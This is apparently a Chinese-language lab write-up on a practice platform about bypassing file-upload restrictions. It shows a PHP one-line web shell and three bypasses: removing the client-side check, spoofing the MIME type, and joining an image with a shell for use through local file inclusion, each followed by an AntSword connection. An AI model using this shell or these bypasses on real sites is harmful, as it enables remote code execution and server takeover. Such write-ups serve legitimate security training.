文件上传(Unsafe Fileupload)
-
Client check
首先我们先制作一句话的木马,并且以 .php 命名
<?php
echo "PHP Loaded"; //便于确认是否成功上传
eval($_POST['a']);
?>
提示只允许上传图片
按F12找到οnchange=“”并删除
上传成功
蚁剑连接
-
MIME type
上传小马,并抓包
将Content-Type: 改为image/png
放包
显示上传成功
蚁剑连接
-
Getimagesize
先制作图片马
准备好一张图片(.png)和一句话的木马(.php)
命令copy /b xxx.png + yyy.php zzz.png
合成图片马zzz.png
上传成功
到上传的目录查看文件
但是图片没有解析,没有执行我们的php代码
所以要结合文件包含
让本地文件包含漏洞找到我们的png图片
到文件包含(local)下
包含我们上传的图片
复制之前上传文件的目录进行包含
加了两个../成功了
蚁剑连接